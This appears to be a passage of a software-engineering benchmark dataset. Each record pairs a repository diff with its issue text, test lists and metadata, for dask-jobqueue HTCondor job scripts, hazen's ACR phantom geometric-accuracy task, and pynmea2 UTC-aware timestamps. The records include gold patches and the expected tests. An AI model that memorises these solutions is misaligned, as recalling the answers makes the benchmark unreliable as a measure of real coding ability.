can be used, called ``MoabCluster``:
|
dask/dask-jobqueue
|
066f69c0994d2a87b7b0a54d7de6e2d296d04575
|
diff --git a/dask_jobqueue/tests/test_htcondor.py b/dask_jobqueue/tests/test_htcondor.py
index 99a5573..1664da8 100644
--- a/dask_jobqueue/tests/test_htcondor.py
+++ b/dask_jobqueue/tests/test_htcondor.py
@@ -27,7 +27,12 @@ def test_job_script():
processes=2,
memory="100MB",
disk="100MB",
- env_extra=['export LANG="en_US.utf8"', 'export LC_ALL="en_US.utf8"'],
+ env_extra=[
+ 'export LANG="en_US.utf8"',
+ 'export LC_ALL="en_US.utf8"',
+ "cd /some/path/",
+ "source venv/bin/activate",
+ ],
job_extra={"+Extra": "True"},
submit_command_extra=["-verbose"],
cancel_command_extra=["-forcex"],
@@ -40,9 +45,10 @@ def test_job_script():
assert "MY.DaskWorkerDisk = 100000000" in job_script
assert "MY.DaskWorkerMemory = 100000000" in job_script
assert 'MY.JobId = "$(ClusterId).$(ProcId)"' in job_script
- assert "LANG=en_US.utf8" in job_script
- assert "LC_ALL=en_US.utf8" in job_script
- assert "export" not in job_script
+ assert 'export LANG=""en_US.utf8""' in job_script
+ assert 'export LC_ALL=""en_US.utf8""' in job_script
+ assert "cd /some/path/" in job_script
+ assert "source venv/bin/activate" in job_script
assert "+Extra = True" in job_script
assert re.search(
r"condor_submit\s.*-verbose", cluster._dummy_job.submit_command
|
Incorrect description for env_extra for HTCondorCluster
Hi,
The description for env_extra in [HTCondorCluster](https://jobqueue.dask.org/en/latest/generated/dask_jobqueue.HTCondorCluster.html#dask_jobqueue.HTCondorCluster) is not correct: the job that HTCondorCluster creates calls dask-worker directly instead of through a bash wrapper script, so you cannot put arbitrary shell commands into env_extra.
The interface supports environment variables as `key=value` pairs, which will be inserted into dask-worker's environment (via the "Environment" attribute in the submit file). (For consistency, you can write `export foo=bar` but the word "export" will be ignored.)
This is also important to keep in mind with regards to #323; renaming env_extra to job_script_extra or similar would be even more inaccurate (for the HTCondor case anyway).
|
0.0
|
066f69c0994d2a87b7b0a54d7de6e2d296d04575
|
[
"dask_jobqueue/tests/test_htcondor.py::test_job_script"
] |
[
"dask_jobqueue/tests/test_htcondor.py::test_header",
"dask_jobqueue/tests/test_htcondor.py::test_config_name_htcondor_takes_custom_config"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_issue_reference",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-07-26 13:35:37+00:00
|
bsd-3-clause
| 1,804
|
|
GSTT-CSC__hazen-312
|
diff --git a/hazenlib/tasks/acr_geometric_accuracy.py b/hazenlib/tasks/acr_geometric_accuracy.py
new file mode 100644
index 0000000..b71f00b
--- /dev/null
+++ b/hazenlib/tasks/acr_geometric_accuracy.py
@@ -0,0 +1,241 @@
+"""
+ACR Geometric Accuracy
+https://www.acraccreditation.org/-/media/acraccreditation/documents/mri/largephantomguidance.pdf
+
+Calculates geometric accuracy for slices 1 and 5 of the ACR phantom.
+
+This script calculates the horizontal and vertical lengths of the ACR phantom in Slice 1 in accordance with the ACR Guidance.
+This script calculates the horizontal, vertical and diagonal lengths of the ACR phantom in Slice 5 in accordance with the ACR Guidance.
+The average distance measurement error, maximum distance measurement error and coefficient of variation of all distance
+measurements is reported as recommended by IPEM Report 112, "Quality Control and Artefacts in Magnetic Resonance Imaging".
+
+This is done by first producing a binary mask for each respective slice. Line profiles are drawn with aid of rotation
+matrices around the centre of the test object to determine each respective length. The results are also visualised.
+
+Created by Yassine Azma
+yassine.azma@rmh.nhs.uk
+
+18/11/2022
+"""
+
+import sys
+import traceback
+import os
+import numpy as np
+import skimage.morphology
+import skimage.measure
+import skimage.transform
+
+from hazenlib.HazenTask import HazenTask
+
+
+class ACRGeometricAccuracy(HazenTask):
+
+ def __init__(self, **kwargs):
+ super().__init__(**kwargs)
+
+ def run(self) -> dict:
+ results = {}
+ z = []
+ for dcm in self.data:
+ z.append(dcm.ImagePositionPatient[2])
+
+ idx_sort = np.argsort(z)
+
+ for dcm in self.data:
+ if dcm.ImagePositionPatient[2] == z[idx_sort[0]]:
+ try:
+ result1 = self.get_geometric_accuracy_slice1(dcm)
+ except Exception as e:
+ print(f"Could not calculate the geometric accuracy for {self.key(dcm)} because of : {e}")
+ traceback.print_exc(file=sys.stdout)
+ continue
+
+ results[self.key(dcm)] = result1
+ elif dcm.ImagePositionPatient[2] == z[idx_sort[4]]:
+ try:
+ result5 = self.get_geometric_accuracy_slice5(dcm)
+ except Exception as e:
+ print(f"Could not calculate the geometric accuracy for {self.key(dcm)} because of : {e}")
+ traceback.print_exc(file=sys.stdout)
+ continue
+
+ results[self.key(dcm)] = result5
+
+ results['reports'] = {'images': self.report_files}
+
+ L = result1 + result5
+ mean_err, max_err, cov_l = self.distortion_metric(L)
+ print(f"Mean relative measurement error is equal to {np.round(mean_err, 2)}mm")
+ print(f"Maximum absolute measurement error is equal to {np.round(max_err, 2)}mm")
+ print(f"Coefficient of variation of measurements is equal to {np.round(cov_l, 2)}%")
+ return results
+
+ def centroid_com(self, dcm):
+ # Calculate centroid of object using a centre-of-mass calculation
+ thresh_img = dcm > 0.25 * np.max(dcm)
+ open_img = skimage.morphology.area_opening(thresh_img, area_threshold=500)
+ bhull = skimage.morphology.convex_hull_image(open_img)
+ coords = np.nonzero(bhull) # row major - first array is columns
+
+ sum_x = np.sum(coords[1])
+ sum_y = np.sum(coords[0])
+ cx, cy = sum_x / coords[0].shape[0], sum_y / coords[1].shape[0]
+ cxy = (round(cx), round(cy))
+
+ return bhull, cxy
+
+ def horizontal_length(self, res, mask, cxy):
+ dims = mask.shape
+ start_h = (cxy[1], 0)
+ end_h = (cxy[1], dims[0] - 1)
+ line_profile_h = skimage.measure.profile_line(mask, start_h, end_h, mode='reflect')
+ extent_h = np.nonzero(line_profile_h)[0]
+ dist_h = (extent_h[-1] - extent_h[0]) * res[0]
+
+ h_dict = {
+ 'Start': start_h,
+ 'End': end_h,
+ 'Extent': extent_h,
+ 'Distance': dist_h
+ }
+ return h_dict
+
+ def vertical_length(self, res, mask, cxy):
+ dims = mask.shape
+ start_v = (0, cxy[0])
+ end_v = (dims[1] - 1, cxy[0])
+ line_profile_v = skimage.measure.profile_line(mask, start_v, end_v, mode='reflect')
+ extent_v = np.nonzero(line_profile_v)[0]
+ dist_v = (extent_v[-1] - extent_v[0]) * res[1]
+
+ v_dict = {
+ 'Start': start_v,
+ 'End': end_v,
+ 'Extent': extent_v,
+ 'Distance': dist_v
+ }
+ return v_dict
+
+ def rotate_point(self, origin, point, angle):
+ theta = np.radians(angle)
+ c, s = np.cos(theta), np.sin(theta)
+
+ x_prime = origin[0] + c * (point[0] - origin[0]) - s * (point[1] - origin[1])
+ y_prime = origin[1] + s * (point[0] - origin[0]) + c * (point[1] - origin[1])
+ return x_prime, y_prime
+
+ def diagonal_lengths(self, res, mask, cxy):
+ eff_res = np.sqrt(np.mean(np.square(res)))
+ mask_rotate = skimage.transform.rotate(mask, 45, center=(cxy[0], cxy[1]))
+
+ h_dict = self.horizontal_length(res, mask_rotate, cxy)
+ extent_h = h_dict['Extent']
+
+ origin = (cxy[0], cxy[1])
+ start = (extent_h[0], cxy[1])
+ end = (extent_h[-1], cxy[1])
+ se_x_start, se_y_start = self.rotate_point(origin, start, 45)
+ se_x_end, se_y_end = self.rotate_point(origin, end, 45)
+
+ dist_se = np.sqrt(np.sum(np.square([se_x_end - se_x_start, se_y_end - se_y_start]))) * eff_res
+ se_dict = {
+ 'Start': (se_x_start, se_y_start),
+ 'End': (se_x_end, se_y_end),
+ 'Extent': (se_x_end - se_x_start, se_y_end - se_y_start),
+ 'Distance': dist_se
+ }
+
+ v_dict = self.vertical_length(res, mask_rotate, cxy)
+ extent_v = v_dict['Extent']
+
+ start = (cxy[0], extent_v[0])
+ end = (cxy[0], extent_v[-1])
+ sw_x_start, sw_y_start = self.rotate_point(origin, start, 45)
+ sw_x_end, sw_y_end = self.rotate_point(origin, end, 45)
+
+ dist_sw = np.sqrt(np.sum(np.square([sw_x_end - sw_x_start, sw_y_end - sw_y_start]))) * eff_res
+ sw_dict = {
+ 'Start': (sw_x_start, sw_y_start),
+ 'End': (sw_x_end, sw_y_end),
+ 'Extent': (sw_x_end - sw_x_start, sw_y_end - sw_y_start),
+ 'Distance': dist_sw
+ }
+
+ return sw_dict, se_dict
+
+ def get_geometric_accuracy_slice1(self, dcm):
+ img = dcm.pixel_array
+ res = dcm.PixelSpacing
+ mask, cxy = self.centroid_com(img)
+
+ h_dict = self.horizontal_length(res, mask, cxy)
+ v_dict = self.vertical_length(res, mask, cxy)
+
+ if self.report:
+ import matplotlib.pyplot as plt
+ fig = plt.figure()
+ fig.set_size_inches(8, 8)
+ plt.imshow(img)
+
+ plt.arrow(h_dict['Extent'][0], cxy[1], h_dict['Extent'][-1] - h_dict['Extent'][0], 1, color='blue',
+ length_includes_head=True, head_width=5)
+ plt.arrow(cxy[0], v_dict['Extent'][0], 1, v_dict['Extent'][-1] - v_dict['Extent'][0], color='orange',
+ length_includes_head=True, head_width=5)
+ plt.legend([str(np.round(h_dict['Distance'], 2)) + 'mm',
+ str(np.round(v_dict['Distance'], 2)) + 'mm'])
+ plt.axis('off')
+ plt.title('Geometric Accuracy for Slice 1')
+
+ img_path = os.path.realpath(os.path.join(self.report_path, f'{self.key(dcm)}.png'))
+ fig.savefig(img_path)
+ self.report_files.append(img_path)
+
+ return h_dict['Distance'], v_dict['Distance']
+
+ def get_geometric_accuracy_slice5(self, dcm):
+ img = dcm.pixel_array
+ res = dcm.PixelSpacing
+ mask, cxy = self.centroid_com(img)
+
+ h_dict = self.horizontal_length(res, mask, cxy)
+ v_dict = self.vertical_length(res, mask, cxy)
+ sw_dict, se_dict = self.diagonal_lengths(res, mask, cxy)
+
+ if self.report:
+ import matplotlib.pyplot as plt
+ fig = plt.figure()
+ fig.set_size_inches(8, 8)
+ plt.imshow(img)
+
+ plt.arrow(h_dict['Extent'][0], cxy[1], h_dict['Extent'][-1] - h_dict['Extent'][0], 1, color='blue',
+ length_includes_head=True, head_width=5)
+ plt.arrow(cxy[0], v_dict['Extent'][0], 1, v_dict['Extent'][-1] - v_dict['Extent'][0], color='orange',
+ length_includes_head=True, head_width=5)
+
+ plt.arrow(se_dict['Start'][0], se_dict['Start'][1], se_dict['Extent'][0], se_dict['Extent'][1],
+ color='purple', length_includes_head=True, head_width=5)
+ plt.arrow(sw_dict['Start'][0], sw_dict['Start'][1], sw_dict['Extent'][0], sw_dict['Extent'][1],
+ color='yellow', length_includes_head=True, head_width=5)
+
+ plt.legend([str(np.round(h_dict['Distance'], 2)) + 'mm',
+ str(np.round(v_dict['Distance'], 2)) + 'mm',
+ str(np.round(sw_dict['Distance'], 2)) + 'mm',
+ str(np.round(se_dict['Distance'], 2)) + 'mm'])
+ plt.axis('off')
+ plt.title('Geometric Accuracy for Slice 5')
+
+ img_path = os.path.realpath(os.path.join(self.report_path, f'{self.key(dcm)}.png'))
+ fig.savefig(img_path)
+ self.report_files.append(img_path)
+
+ return h_dict['Distance'], v_dict['Distance'], sw_dict['Distance'], se_dict['Distance']
+
+ def distortion_metric(self, L):
+ err = [x - 190 for x in L]
+ mean_err = np.mean(err)
+
+ max_err = np.max(np.absolute(err))
+ cov_l = 100 * np.std(L) / np.mean(L)
+
+ return mean_err, max_err, cov_l
|
GSTT-CSC/hazen
|
8aaa233168a543c493961f193802fc4607ac4997
|
diff --git a/.github/workflows/test_cli.yml b/.github/workflows/test_cli.yml
index 9082b13..203650d 100644
--- a/.github/workflows/test_cli.yml
+++ b/.github/workflows/test_cli.yml
@@ -55,6 +55,11 @@ jobs:
run: |
hazen acr_ghosting tests/data/acr/Siemens --report
+ - name: test acr_geometric_accuracy
+ if: always() # will always run regardless of whether previous step fails - useful to ensure all CLI functions tested
+ run: |
+ hazen acr_geometric_accuracy tests/data/acr/Siemens --report
+
- name: test slice_position
if: always() # will always run regardless of whether previous step fails - useful to ensure all CLI functions tested
run: |
diff --git a/tests/test_acr_geometric_accuracy.py b/tests/test_acr_geometric_accuracy.py
new file mode 100644
index 0000000..0de6d26
--- /dev/null
+++ b/tests/test_acr_geometric_accuracy.py
@@ -0,0 +1,72 @@
+import os
+import unittest
+import pathlib
+import pydicom
+import numpy as np
+
+from hazenlib.tasks.acr_geometric_accuracy import ACRGeometricAccuracy
+from tests import TEST_DATA_DIR, TEST_REPORT_DIR
+
+
+class TestACRGeometricAccuracySiemens(unittest.TestCase):
+ ACR_GEOMETRIC_ACCURACY_DATA = pathlib.Path(TEST_DATA_DIR / 'acr')
+ centre = (128, 129)
+ L1 = 190.43, 186.52
+ L5 = 190.43, 186.52, 189.45, 191.41
+ test_point = (-60.98, -45.62)
+
+ def setUp(self):
+ self.acr_geometric_accuracy_task = ACRGeometricAccuracy(data_paths=[os.path.join(TEST_DATA_DIR, 'acr')],
+ report_dir=pathlib.PurePath.joinpath(TEST_REPORT_DIR))
+ self.dcm = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'Siemens', '0.dcm'))
+ self.dcm2 = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'Siemens', '4.dcm'))
+
+ def test_object_centre(self):
+ data = self.dcm.pixel_array
+ assert self.acr_geometric_accuracy_task.centroid_com(data)[1] == self.centre
+
+ def test_geo_accuracy_slice1(self):
+ slice1_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice1(self.dcm))
+ slice1_vals = np.round(slice1_vals, 2)
+ assert (slice1_vals == self.L1).all() == True
+
+ def test_geo_accuracy_slice5(self):
+ slice5_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice5(self.dcm2))
+ slice5_vals = np.round(slice5_vals, 2)
+ assert (slice5_vals == self.L5).all() == True
+
+ def test_rotate_point(self):
+ rotated_point = np.array(self.acr_geometric_accuracy_task.rotate_point((0, 0), (30, 70), 150))
+ rotated_point = np.round(rotated_point, 2)
+ print(rotated_point)
+ assert (rotated_point == self.test_point).all() == True
+
+
+# class TestACRUniformityPhilips(unittest.TestCase):
+
+class TestACRGeometricAccuracyGE(unittest.TestCase):
+ ACR_GEOMETRIC_ACCURACY_DATA = pathlib.Path(TEST_DATA_DIR / 'acr')
+ L1 = 189.92, 187.89
+ L5 = 189.92, 188.39, 190.43, 189.92
+ distortion_metrics = [-0.59, 2.11, 0.49]
+
+ def setUp(self):
+ self.acr_geometric_accuracy_task = ACRGeometricAccuracy(data_paths=[os.path.join(TEST_DATA_DIR, 'acr')],
+ report_dir=pathlib.PurePath.joinpath(TEST_REPORT_DIR))
+ self.dcm = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'GE', '10.dcm'))
+ self.dcm2 = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'GE', '6.dcm'))
+
+ def test_geo_accuracy_slice1(self):
+ slice1_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice1(self.dcm))
+ slice1_vals = np.round(slice1_vals, 2)
+ assert (slice1_vals == self.L1).all() == True
+
+ def test_geo_accuracy_slice5(self):
+ slice5_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice5(self.dcm2))
+ slice5_vals = np.round(slice5_vals, 2)
+ assert (slice5_vals == self.L5).all() == True
+
+ def test_distortion_metrics(self):
+ metrics = np.array(self.acr_geometric_accuracy_task.distortion_metric(self.L1+self.L5))
+ metrics = np.round(metrics, 2)
+ assert (metrics == self.distortion_metrics).all() == True
|
[ACR5] Geometric accuracy
For the geometric accuracy - currently under slice width in hazen - use slice 1 and slice 5 of an ACR_TRA_T1_NORMOFF series. In slice 1, measure the diameter of the phantom: top-to-bottom and left-to-right and on slice 5 measure the diameter of the phantom in 4 directions: top-to-bottom, left-to-right, and both diagonals. The diameter is 190 mm and all lengths should be within ± 2 mm. Beware that on top of the phantom due to a water bubble there will be a n extended dark area.
Priority: High for ACR

|
0.0
|
8aaa233168a543c493961f193802fc4607ac4997
|
[
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_geo_accuracy_slice1",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_geo_accuracy_slice5",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_object_centre",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_rotate_point",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracyGE::test_distortion_metrics",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracyGE::test_geo_accuracy_slice1",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracyGE::test_geo_accuracy_slice5"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_media",
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-01-18 12:44:41+00:00
|
apache-2.0
| 260
|
|
Knio__pynmea2-151
|
diff --git a/examples/nmea2gpx.py b/examples/nmea2gpx.py
new file mode 100644
index 0000000..87154ee
--- /dev/null
+++ b/examples/nmea2gpx.py
@@ -0,0 +1,103 @@
+'''
+Convert a NMEA ascii log file into a GPX file
+'''
+
+import argparse
+import datetime
+import logging
+import pathlib
+import re
+import xml.dom.minidom
+
+log = logging.getLogger(__name__)
+
+try:
+ import pynmea2
+except ImportError:
+ import sys
+ import pathlib
+ p = pathlib.Path(__file__).parent.parent
+ sys.path.append(str(p))
+ log.info(sys.path)
+ import pynmea2
+
+
+def main():
+ parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
+ parser.add_argument('nmea_file')
+
+ args = parser.parse_args()
+ nmea_file = pathlib.Path(args.nmea_file)
+
+ if m := re.match(r'^(\d{2})(\d{2})(\d{2})', nmea_file.name):
+ date = datetime.date(year=2000 + int(m.group(1)), month=int(m.group(2)), day=int(m.group(3)))
+ log.debug('date parsed from filename: %r', date)
+ else:
+ date = None
+
+ author = 'https://github.com/Knio/pynmea2'
+ doc = xml.dom.minidom.Document()
+ doc.appendChild(root := doc.createElement('gpx'))
+ root.setAttribute('xmlns', "http://www.topografix.com/GPX/1/1")
+ root.setAttribute('version', "1.1")
+ root.setAttribute('creator', author)
+ root.setAttribute('xmlns', "http://www.topografix.com/GPX/1/1")
+ root.setAttribute('xmlns:xsi', "http://www.w3.org/2001/XMLSchema-instance")
+ root.setAttribute('xsi:schemaLocation', "http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd")
+
+ root.appendChild(meta := doc.createElement('metadata'))
+ root.appendChild(trk := doc.createElement('trk'))
+ meta.appendChild(meta_name := doc.createElement('name'))
+ meta.appendChild(meta_author := doc.createElement('author'))
+ trk.appendChild(trk_name := doc.createElement('name'))
+ trk.appendChild(trkseg := doc.createElement('trkseg'))
+ meta_name.appendChild(doc.createTextNode(nmea_file.name))
+ trk_name. appendChild(doc.createTextNode(nmea_file.name))
+ meta_author.appendChild(author_link := doc.createElement('link'))
+ author_link.setAttribute('href', author)
+ author_link.appendChild(author_text := doc.createElement('text'))
+ author_link.appendChild(author_type := doc.createElement('type'))
+ author_text.appendChild(doc.createTextNode('Pynmea2'))
+ author_type.appendChild(doc.createTextNode('text/html'))
+
+ for line in open(args.nmea_file):
+ try:
+ msg = pynmea2.parse(line)
+ except Exception as e:
+ log.warning('Couldn\'t parse line: %r', e)
+ continue
+
+ if not (hasattr(msg, 'latitude') and hasattr(msg, 'longitude')):
+ continue
+
+ # if not hasattr(msg, 'altitude'):
+ # continue
+
+ trkseg.appendChild(trkpt := doc.createElement('trkpt'))
+
+ trkpt.setAttribute('lat', f'{msg.latitude:.6f}')
+ trkpt.setAttribute('lon', f'{msg.longitude:.6f}')
+ if hasattr(msg, 'altitude'):
+ trkpt.appendChild(ele := doc.createElement('ele'))
+ ele.appendChild(doc.createTextNode(f'{msg.altitude:.3f}'))
+
+ # TODO try msg.datetime
+
+ if date:
+ trkpt.appendChild(time := doc.createElement('time'))
+ dt = datetime.datetime.combine(date, msg.timestamp)
+ dts = dt.isoformat(timespec='milliseconds').replace('+00:00', 'Z')
+ time.appendChild(doc.createTextNode(dts))
+
+ xml_data = doc.toprettyxml(
+ indent=' ',
+ newl='\n',
+ encoding='utf8',
+ ).decode('utf8')
+ print(xml_data)
+
+
+
+if __name__ == '__main__':
+ logging.basicConfig(level=logging.DEBUG)
+ main()
\ No newline at end of file
diff --git a/pynmea2/nmea_utils.py b/pynmea2/nmea_utils.py
index 8cb64e8..36f0f95 100644
--- a/pynmea2/nmea_utils.py
+++ b/pynmea2/nmea_utils.py
@@ -2,6 +2,17 @@
import datetime
import re
+
+# python 2.7 backport
+if not hasattr(datetime, 'timezone'):
+ class UTC(datetime.tzinfo):
+ def utcoffset(self, dt):
+ return datetime.timedelta(0)
+ class timezone(object):
+ utc = UTC()
+ datetime.timezone = timezone
+
+
def valid(s):
return s == 'A'
@@ -18,7 +29,8 @@ def timestamp(s):
hour=int(s[0:2]),
minute=int(s[2:4]),
second=int(s[4:6]),
- microsecond=ms)
+ microsecond=ms,
+ tzinfo=datetime.timezone.utc)
return t
diff --git a/pynmea2/types/talker.py b/pynmea2/types/talker.py
index d27ddfe..8c00c7a 100644
--- a/pynmea2/types/talker.py
+++ b/pynmea2/types/talker.py
@@ -507,7 +507,7 @@ class XTE(TalkerSentence):
)
-class ZDA(TalkerSentence):
+class ZDA(TalkerSentence, DatetimeFix):
fields = (
("Timestamp", "timestamp", timestamp), # hhmmss.ss = UTC
("Day", "day", int), # 01 to 31
@@ -526,9 +526,9 @@ class ZDA(TalkerSentence):
return TZInfo(self.local_zone, self.local_zone_minutes)
@property
- def datetime(self):
+ def localdatetime(self):
d = datetime.datetime.combine(self.datestamp, self.timestamp)
- return d.replace(tzinfo=self.tzinfo)
+ return d.astimezone(self.tzinfo)
|
Knio/pynmea2
|
988c297ce82d976db9094b435a1aa290e7d5b9ed
|
diff --git a/test/test_ash.py b/test/test_ash.py
index 37ad969..b7a9425 100644
--- a/test/test_ash.py
+++ b/test/test_ash.py
@@ -19,7 +19,7 @@ def test_ashratt():
assert type(msg) == pynmea2.ash.ASHRATT
assert msg.data == ['R', '130533.620', '0.311', 'T', '-80.467', '-1.395', '0.25', '0.066', '0.067', '0.215', '2', '3']
assert msg.manufacturer == 'ASH'
- assert msg.timestamp == datetime.time(13, 5, 33, 620000)
+ assert msg.timestamp == datetime.time(13, 5, 33, 620000, tzinfo=datetime.timezone.utc)
assert msg.true_heading == 0.311
assert msg.is_true_heading == 'T'
assert msg.roll == -80.467
diff --git a/test/test_nor.py b/test/test_nor.py
index a95d7a0..2c020b5 100644
--- a/test/test_nor.py
+++ b/test/test_nor.py
@@ -11,7 +11,7 @@ def test_norbt0():
assert msg.sentence_type == 'NORBT0'
assert msg.beam == 1
assert msg.datestamp == datetime.date(2021, 7, 4)
- assert msg.timestamp == datetime.time(13, 13, 35, 334100)
+ assert msg.timestamp == datetime.time(13, 13, 35, 334100, tzinfo=datetime.timezone.utc)
assert msg.dt1 == 23.961
assert msg.dt2 == -48.122
assert msg.bv == -32.76800
@@ -164,7 +164,7 @@ def test_nors1():
assert msg.manufacturer == 'NOR'
assert msg.sentence_type == 'NORS1'
assert msg.datestamp == datetime.date(2009, 11, 16)
- assert msg.timestamp == datetime.time(13, 24, 55)
+ assert msg.timestamp == datetime.time(13, 24, 55, tzinfo=datetime.timezone.utc)
assert msg.ec == 0
assert msg.sc == '34000034'
assert msg.battery_voltage == 23.9
@@ -203,7 +203,7 @@ def test_norc1():
assert type(msg) == pynmea2.nor.NORC1
assert msg.manufacturer == 'NOR'
assert msg.sentence_type == 'NORC1'
- assert msg.datetime == datetime.datetime(2009, 11, 16, 13, 24, 55)
+ assert msg.datetime == datetime.datetime(2009, 11, 16, 13, 24, 55, tzinfo=datetime.timezone.utc)
assert msg.cn == 3
assert msg.cp == 11.0
assert msg.vx == 0.332
@@ -242,7 +242,7 @@ def test_norh4():
assert msg.manufacturer == 'NOR'
assert msg.sentence_type == 'NORH4'
assert msg.datestamp == datetime.date(2009, 11, 16)
- assert msg.timestamp == datetime.time(14, 34, 59)
+ assert msg.timestamp == datetime.time(14, 34, 59, tzinfo=datetime.timezone.utc)
assert msg.ec == 0
assert msg.sc == '204C0002'
assert msg.render() == data
diff --git a/test/test_proprietary.py b/test/test_proprietary.py
index 3e6a526..58995f8 100644
--- a/test/test_proprietary.py
+++ b/test/test_proprietary.py
@@ -138,7 +138,7 @@ def test_ubx00():
assert type(msg) == pynmea2.ubx.UBX00
assert msg.identifier() == 'PUBX'
assert msg.ubx_type == '00'
- assert msg.timestamp == datetime.time(7, 44, 40)
+ assert msg.timestamp == datetime.time(7, 44, 40, tzinfo=datetime.timezone.utc)
assert msg.latitude == 47.06236716666667
assert msg.lat_dir == 'N'
assert msg.render() == data
@@ -157,7 +157,7 @@ def test_ubx04():
msg = pynmea2.parse(data)
assert type(msg) == pynmea2.ubx.UBX04
assert msg.date == datetime.date(2014, 10, 13)
- assert msg.time == datetime.time(7, 38, 24)
+ assert msg.time == datetime.time(7, 38, 24, tzinfo=datetime.timezone.utc)
assert msg.clk_bias == 495176
assert msg.render() == data
@@ -239,7 +239,7 @@ def test_KWDWPL():
data = "$PKWDWPL,053125,V,4531.7900,N,12253.4800,W,,,200320,,AC7FD-1,/-*10"
msg = pynmea2.parse(data)
assert msg.manufacturer == "KWD"
- assert msg.timestamp == datetime.time(5, 31, 25)
+ assert msg.timestamp == datetime.time(5, 31, 25, tzinfo=datetime.timezone.utc)
assert msg.status == 'V'
assert msg.is_valid == False
assert msg.lat == '4531.7900'
@@ -249,7 +249,7 @@ def test_KWDWPL():
assert msg.sog == None
assert msg.cog == None
assert msg.datestamp == datetime.date(2020, 3, 20)
- assert msg.datetime == datetime.datetime(2020, 3, 20, 5, 31, 25)
+ assert msg.datetime == datetime.datetime(2020, 3, 20, 5, 31, 25, tzinfo=datetime.timezone.utc)
assert msg.altitude == None
assert msg.wname == 'AC7FD-1'
assert msg.ts == '/-'
diff --git a/test/test_types.py b/test/test_types.py
index 565664d..1164d38 100644
--- a/test/test_types.py
+++ b/test/test_types.py
@@ -13,7 +13,7 @@ def test_GGA():
assert isinstance(msg, pynmea2.GGA)
# Timestamp
- assert msg.timestamp == datetime.time(18, 43, 53, 70000)
+ assert msg.timestamp == datetime.time(18, 43, 53, 70000, tzinfo=datetime.timezone.utc)
# Latitude
assert msg.lat == '1929.045'
# Latitude Direction
@@ -99,7 +99,7 @@ def test_GST():
data = "$GPGST,172814.0,0.006,0.023,0.020,273.6,0.023,0.020,0.031*6A"
msg = pynmea2.parse(data)
assert isinstance(msg, pynmea2.GST)
- assert msg.timestamp == datetime.time(hour=17, minute=28, second=14)
+ assert msg.timestamp == datetime.time(hour=17, minute=28, second=14, tzinfo=datetime.timezone.utc)
assert msg.rms == 0.006
assert msg.std_dev_major == 0.023
assert msg.std_dev_minor == 0.020
@@ -114,11 +114,11 @@ def test_RMC():
data = '''$GPRMC,225446,A,4916.45,N,12311.12,W,000.5,054.7,191194,020.3,E*68'''
msg = pynmea2.parse(data)
assert isinstance(msg, pynmea2.RMC)
- assert msg.timestamp == datetime.time(hour=22, minute=54, second=46)
+ assert msg.timestamp == datetime.time(hour=22, minute=54, second=46, tzinfo=datetime.timezone.utc)
assert msg.datestamp == datetime.date(1994, 11, 19)
assert msg.latitude == 49.274166666666666
assert msg.longitude == -123.18533333333333
- assert msg.datetime == datetime.datetime(1994, 11, 19, 22, 54, 46)
+ assert msg.datetime == datetime.datetime(1994, 11, 19, 22, 54, 46, tzinfo=datetime.timezone.utc)
assert msg.is_valid == True
assert msg.render() == data
@@ -129,7 +129,7 @@ def test_RMC_valid():
only test validation against supplied values.
Supplied means that a `,` exists it does NOT mean that a value had to be
- supplied in the space provided. See
+ supplied in the space provided. See
https://orolia.com/manuals/VSP/Content/NC_and_SS/Com/Topics/APPENDIX/NMEA_RMCmess.htm
@@ -140,7 +140,7 @@ def test_RMC_valid():
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,*33',
'$GPRMC,123519.00,V,4807.038,N,01131.000,E,,,230394,,*24',
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,*72',
-
+
# RMC Timing Messages
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,S*4C',
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,N*51',
@@ -151,7 +151,7 @@ def test_RMC_valid():
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,,S*0D',
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,,N*10',
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,,*5E',
-
+
# RMC Nav Messags
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,S,S*33',
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,S,V*36',
@@ -204,14 +204,16 @@ def test_ZDA():
data = '''$GPZDA,010203.05,06,07,2008,-08,30'''
msg = pynmea2.parse(data)
assert isinstance(msg, pynmea2.ZDA)
- assert msg.timestamp == datetime.time(hour=1, minute=2, second=3, microsecond=50000)
+ assert msg.timestamp == datetime.time(hour=1, minute=2, second=3, microsecond=50000, tzinfo=datetime.timezone.utc)
assert msg.day == 6
assert msg.month == 7
assert msg.year == 2008
+ assert msg.tzinfo.utcoffset(0) == datetime.timedelta(hours=-8, minutes=30)
assert msg.local_zone == -8
assert msg.local_zone_minutes == 30
assert msg.datestamp == datetime.date(2008, 7, 6)
- assert msg.datetime == datetime.datetime(2008, 7, 6, 1, 2, 3, 50000, msg.tzinfo)
